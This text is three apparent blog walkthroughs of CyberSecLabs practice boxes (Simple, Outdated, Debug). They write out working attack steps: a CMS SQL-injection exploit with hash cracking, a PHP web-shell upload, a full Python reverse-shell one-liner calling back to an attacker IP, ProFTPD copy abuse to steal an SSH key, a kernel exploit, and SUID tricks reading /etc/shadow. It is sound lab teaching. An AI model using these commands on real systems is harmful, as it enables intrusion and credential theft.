CyberSecLabs – “Simple” Walkthrough

CyberSecLabs

Simple from CyberSecLabs is a beginner Linux box hosting a CMS Made Simple website. We’ll gain access to the target through a SQLi attack to find creds and then get a reverse shell through the admin web console. Finally we’ll use a binary with the SUID bit set to escalate our privileges to root.

Let’s get started.

Simple’s IP address is 172.31.1.2

Scanning and Enumeration

As always we start with a simple Nmap scan of the target.

nmap -sC -sV 172.31.1.2

Initial Nmap scan reveals to open ports. SSH on port 22, and HTTP on port 80. Which is also hosting a webserver.

Since we used -sC for default scripts, the Nmap scan results display the header info where we see its a website running on CMS Made Simple.

We discovered a web server let’s go ahead and run Gobuster to find any hidden or interesting directories.

gobuster dir –wordlist /usr/share/wordlists/dirb/big.txt –url 172.31.1.2

Fairly standard directories for a web server, however let’s note the the /admin which most likely contains a login page, and the /uploads folder which we might be able to use later on.

Now let’s check out the site in our browser and see if can learn anything else.

172.31.1.2

Confirmed our webserver is hosting a CMS Made Simple site. If we keep scrolling down to the bottom of the page we get the version information.

CMS Made Simple version 2.2.4

With the versioning information for CMS Made Simple we can start to look for relevant exploits. I’ll do a easy Searchsploit to check for available exploits.

searchsploit cms made simple 2.2 -w

Searchsploit results show a few exploits, but only one of them looks like it applies to our version. That’s the CMS Made Simple < 2.2.10 – SQL Injection.

It’s important to note here that while this isn’t an exact version match of 2.2.4. The presence of the < less than symbol means our exploit works for all versions prior to 2.2.10.

Exploitation

We have an exploit, we just need to run it and let it do its work. To check required arguments and prerequisites I run the exploit with no flags or args.

I immediately get a error. It’s an import error which occurs at the beginning of the python script. A module called termcolor isn’t found. I did a quick google and all we need to do is install this module to resolve the error.

python2 exploit.py

Use pip to install the “termcolor” module.

sudo pip install termcolor

With termcolor installed we can run the exploit. It’s a SQL injection attack which will enumerate the database for information on users, and will crack any hashes found with a wordlist you supply. I’m using the standard rockyou.txt wordlist included on Kali.

python2 exploit.py -u http://172.31.1.2 –crack -w /usr/share/wordlists/rockyou.txt
Exploit results

Success. We’ve enumerated the database and found a user named David and his password hash. Using the Rockyou.txt wordlist we cracked the hash and revealed the password.

Login to the /admin page we found earlier using the credentials we discovered. Enumerate the website. Under Content, we find a File Manger that allows us to upload files to the web server.

CMS File Upload Manager

We have access to the web site file manger. We need to upload a reverse shell that will connect back to our attacker machine and provide a remote shell.

The tried and true PHP reverse shell from PentestMonkey will serve our purposes. This reverse shell is also located on our Kali box.

You’ll need to open up the script and modify the IP and Port information before uploading. After a few tries, I notice that the upload is failing. Most likely the website is filtering certain file extensions. Simply modify the file extension to shtml.

shell.phtml uploaded successfully.

The reverse shell is uploaded. Setup a Netcat listener on the port you specified and navigate to the shell’s URL to execute the script.

nc -lvnp 1234
whoami

We have a reverse shell as the David user. However, this shell is limited. I’ll use python to attempt to spawn a bash prompt.

python -c ‘import pty;pty.spawn(“/bin/bash”)’
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

The first attempt didn’t work because python3 is installed not python 2. Making this adjustment allowed us to spawn a bash prompt as david@simple. This allows us greater flexibility and options while working in the shell.

Privilege Escalation

With a shell established as the low privileged user David we have access to the target. It’s time to enumerate the file system. For this I’ll be using LinPEAS.

First we need to transfer LinPEAS to the target.

Looks like we don’t have access to write to David’s home folder. So I change directory into /tmp and then transfer the file again using wget.

wget http://10.10.0.22/linpeas.sh
cd /tmp
wget http://10.10.0.22/linpeas.sh

Scrolling through the LinPEAS output, under the Interesting Files section we find a binary with the SUID bit set. Systemctl.

Interesting Files section of LinPEAS

Always always always look up binaries you find up GTFObins. Here we see the page for systemctl.

https://gtfobins.github.io/gtfobins/systemctl/

Basically we need to create a something.service file and then link it with systemctl. Inside the .service file we need to specify the command we want executed as root. You could modify this to collect other information but what we need is the root flag. Instead of using echo to create the file locally, I’ll create it on our Kali box and then transfer it with wget.

cat bad.service

I named the file bad.service and it’s ready to transfer. I tried using the /tmp directory but that didn’t work. I eventually found the /dev/shm directory.

With bad.service transferred to the target we just need to issue a few commands to complete the exploit. The first will link the bad.service with systemctl. The second command starts or enables the service. Since the service is running and doesn’t show its output in the terminal, we need one more command to view the status. Inside the status we find the flag as the result of cat /root/system.txt.

/bin/systemctl link /dev/shm/bad.service
/dev/shm$ /bin/systemctl enable –now bad.service
/bin/systemctl status bad.service

Simple from CyberSecLabs. An interesting beginner box that demonstrates the importance of enumeration. Enumeration of the webserver front end, enumeration of the backend using the SQL injection exploit, then enumeration of the admin web console. We then enumerated the file system using LinPEAS to find our binary with the SUID bit set.

Enumerate enumerate enumerate.

CyberSecLabs “Outdated” Walkthrough

CyberSecLabs

Outdated is a beginner level box from CyberSecLabs hosting an NFS share and an outdated version of FTP. After using built-in ProFTP commands to copy files we’ll get our first shell. From there we enumerate the kernel and find an exploit.

Outdated’s IP Address is 172.31.1.22.

Fire up the VPN, let’s get started.

Scanning and Enumeration

As usual we start with a Nmap scan of the target with the following flags.

-sC – run default scripts
-sV – enumerate service version

nmap -sC -sV 172.31.1.22

The Nmap scan results show us a handful of open ports including:
FTP on 21, SSH on 22, RPC on 111 and a NFS share on 2049.

Based on the Nmap results I want to investigate the open NFS share on port 2049. I’d say if you have an open share check that out first.

Use the showmount command to display the name of the share on port 2049. We see that’s its a folder called /var/nfsbackups/.

The next step for investigating a NFS share is to mount the share locally on your attack machine.

showmount -e 172.31.1.22
mount -t nfs 172.31.1.22:/var/nfsbackups/ /root/CSL/Outdated/Mnt/

The share is now mounted on my local machine. It appears we have a backup of three different user’s folders. Simply use LS to list all the files in those folders and we see the folders are empty.

ls -al Mnt/anna/
ls -al Mnt/daniel/
ls -al Mnt/robert/

The NFS share was a dead end. Nothing there that will help us move forward on this box. What now?

We go back to our initial Nmap scans and enumerate another port or service.

Looking at the Nmap scan I see that we have a specific version of FTP running on port 21. ProFTP 1.3.5. When you find a service/version on a open port its worth looking for available exploits.

Seachsploit is the way to do this easily from the terminal.

searchsploit -w proftp 1.3.5

There’s a few exploits available. One Metasploit module and two remote exploits. Let’s take a peek at the exploit code for 36803.

It’s a python script and its making a connection to the server on port 21. If we scroll down into the meat of the code, we see that it attempts to copy the /etc/passwd file to a location of your choosing.

Viewing exploit code – exploit-db.com/exploits/36803

This is important. While this exploit won’t fit our needs exactly, we can learn and utilize pieces of this code to our advantage. If we can connect to port 21 on the target we can use ProFTP commands to copy files from the target.

Netcat can be used to make connections to a target IP address and port. I use the site help command to verify I have the correct commands to copy and paste. The important piece here is not what you are attempting to copy, but where you will paste the file. What’s the most logical choice and place we already have access to? /var/nfsbackups.

nc 172.31.1.22 21
site help
site cpfr /etc/passwd
site cpto /var/nfsbackups/passwd

As a proof of concept we attempt to copy the /etc/passwd file. While we won’t get the password hashes (those are stored separately in the /etc/shadow file, we can learn some useful information from /etc/passwd.

Cat out the contents of /etc/passwd. The only user with /bin/bash is Daniel. Which means this is the account we will utilize to get access to the target.

ls -al Mnt/
cat Mnt/passwd

Exploitation

Our proof of concept was successful so let’s take that idea and use it to copy files that will help us gain access to the box.

Thinking back to our original Nmap scan results. We have SSH open on 22. Daniel is a user that has the ability to login to the target. That means we can copy his home directory and then use his RSA private key to SSH into the box as Daniel.

Follow the same steps as before but this time copy the Daniel’s home folder to /var/nfsbackups/daniel.

nc 172.31.1.22
site cpfr /home/daniel/
site cpto /var/nfsbackups/daniel

The copy shows successful, but let’s confir.

ls -la Mnt/daniel/

Now we see the contents of Daniel’s home folder. The RSA private keys are stored in a hidden folder called .ssh.

All we need to do is use the id_rsa file to SSH into the target.

cd Mnt/daniel/.ssh/
ls
ssh -i id_rsa daniel@172.31.1.22

Success. We used Daniel’s RSA private key to SSH into this box and we have a bash prompt as the Daniel user.

Privilege Escalation

We have access to the target as the user Daniel. Daniel is low privileged user so we will need to escalate ourselves to root. To enumerate this box we will use LinPEAS from the Privilege Escalation Awesome Suite.

I’ll use wget to transfer LinPEAS to the target. Just need to spin up a python simple web server to host the file.

python -m SimpleHTTPServer 80

With LinPEAS.sh transferred to the target we just need to chmod the file permissions to allow it to be executed. After that’s complete go ahead and run LinPEAS.

ls
chmod +x linpeas.sh
./linpeas.sh

Before we get into the LinPEAS output let’s take a look at the Legend. This is important to be aware while reviewing the output and its easy to skip over. If we see something in RED/YELLOW its almost certainly a privilege escalation vector and worth investigating.

LinPEAS Legend

I’ll save some time here while reviewing this output. At the very top of the results we have the Basic info section. If you’ll notice we have a RED/YELLOW highlight on the Linux Kernel version which is 3.13.0.

Basic Info Section of LinPEAS output

I’ll use Searchsploit to do a quick search on that kernel version.

searchsploit 3.13.0

We have a match on the Kernel version. The kernel exploit known as “overlayfs”. If we search around a bit we can find a pre-compiled version of this exploit. You find it here.

Download the ofs_64 file and transfer it to the target. I’ll use wget and a python web server again to facilitate the file transfer.

python3 -m http.server 80

Confirm the file transferred successfully and give it permissions to execute with chmod. Now we are ready to launch the kernel exploit.

ls
chmod +x ofs_64
ls -la

Run the exploit. You’ll return a blank prompt. If we run whoami we see that we are now root.

./ofs_64
whoami

Capture the Flags!

All that’s left is to capture the flags and submit the hashes.

cat /root/system.txt
cat /home/daniel/access.txt

There it is. Outdated from CyberSecLabs. A great box that shows us how to abuse the built in features of ProFTP combined with an exposed NFS share. This is also the first box from CyberSecLabs where we’ve used a kernel exploit for privilege escalation.

CyberSecLabs – “Debug” Walkthrough

CyberSecLabs

Debug from CyberSecLabs is a beginner level Linux machine hosting a website. We’ll start with basic web exploitation for initial access and then learn a useful Linux privilege escalation technique.

Ping your target to verify connectivity. Debug’s IP address is 172.31.1.5.

Scanning

As always, we start with a standard Nmap scan running default scripts, service enumeration enabled, and scanning all 65,535 ports.

nmap -sC -sV -p- 172.31.1.5

You can see in the output we only have two ports to work with. Port 22 hosting ssh services, and port 80 hosting a HTTP web server. This greatly reduces our initial attack surface.

If you haven’t spent a lot of time pentesting, I’ll share my experience looking for SSH exploits. Typically, I’ve found those mostly to be rabbit holes, leading nowhere. Version exploits for SSH do exist, but more often then not especially in CTFs, your probably heading in the wrong direction.

That leaves port 80, and a web server to exploit for our initial access. Browse out to the IP address of Debug, 172.31.1.5. Let’s take a look at the website.

Future Design website

Future Design’s website. We have a couple of pages, some filler text, not a lot there. I don’t see a login page, or anything interesting. Let’s dig a little deeper and see if there’s some hidden directories lurking behind this web server.

There’s several tools that you can use such as OWASP’s Dirbuster, Dirb, or Gobuster. Let’s use Gobuster.

gobuster dir –wordlist /usr/share/wordlists/dirb/big.txt –url 172.31.1.5

gobuster dir –wordlist /usr/share/wordlists/dirb/big.txt –url 172.31.1.5

Notice the two directories we didn’t see listed on the website. One being /console and the other /server-status. When I try and navigate to /server-status I get a 404 error message, indicating I don’t have access to the webpage.

Depending on your preference, and methodology, you could have revealed this hidden /console directory using Nitko web scanner.

nikto -h 172.31.1.5

Initial Access

Navigate to 172.31.1.5/console.

172.31.1.5/console reveals a Interactive Console that allows python code execution

Interesting! We have a interactive console that allows us to execute python commands. I bet we can abuse this feature to get a reverse shell.

Since we know this console can execute python commands, that makes finding the right one-liner easy. If you haven’t already, bookmark this site from PenTestMonkey. It’s a great starting place for testing reverse shell one-liners.

Scroll down until you see this Python one-liner.

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“LHOST”,LPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Since we are already inside a python console, remove the “python -c ‘” and the trailing comma at the end of the line. Make sure you’ve included your LHOST (local host) and a the LPORT (local port).

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.0.41”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);

To receive the python reverse shell we need a netcat listener on whichever port you specified in the one-liner. In this case, my port is 1234. With your netcat listener started, execute the python command from the console.

Sometimes the reverse shell works first try, on other occasions it takes several tries. If you don’t get a shell right away, be patient and execute the command until you do.

nc -lvnp 1234
python -c ‘import pty;pty.spawn(“/bin/bash”)’

We have a simple reverse shell running as the megan user. The first thing I want to do is spawn a TTY shell, which will give us the nice megan@debug prompt.

Privilege Escalation

What now? We need to enumerate the target system, by exploring files and services we can use or modify. This can be done manually, but there’s no reason to when automated tools and scripts will do the job for us.

I’ll be using LinPEAS as our automated privilege escalation tool. It’s part of the Privilege Escalation Awesome Scripts Suite. You can find it on Github.

Download LinPEAS.sh and fire up the Python SimpleHTTPServer on port 80 and we are ready to grab the file with wget.

python -m SimpleHTTPServer 80

I use wget to transfer the linpeas.sh file to the target and chmod to add the execute permission which we’ll need before running LinPEAS.

wget http://10.10.0.41/linpeas.sh
chmod +x linpeas.sh

Run LinPEAS.sh

LinPEAS
LinPEAS.sh output

LinPEAS will generate a lot of output. Under the Interesting Files section, I see a SUID binary highlighted. /usr/share/xxd has the SUID bit set, which will allow us to execute the binary with root level permissions since root is the file owner.

What is xxd? How do we use it? I’d never seen this binary before, so the first thing I did was look it up on GTFOBins. We have a SUID expoit.

XXD will allow us to read the contents of a file within the context of the root user account. What file do we already have on the system that requires root permissions to read? The /etc/shadow file if you aren’t familiar, contains all the actual password hashes for each user account on the system.

xxd /etc/shadow | xxd -r

Great, we have the password hash for the root account, and our low privileged user megan. Copy the hash into a new file, I named mine “hash”. Then use John the Ripper to crack the password using the massive rockyou.txt wordlist.

john –wordlist=/usr/share/wordlists/rockyou.txt hash

We have the actual root password, where do we use it? You might think back to our nmap and open ports. We do have SSH open, but not all accounts have SSH access setup. We need a way to become the root account and Linux has a built-in utility to switch the current user account to the root account.

su
Password
whoami

Notice after the su command and password is entered, our prompt changes context. It’s now a root@debug prompt instead of megan@debug. We’ve got root! Now we can capture all the flags.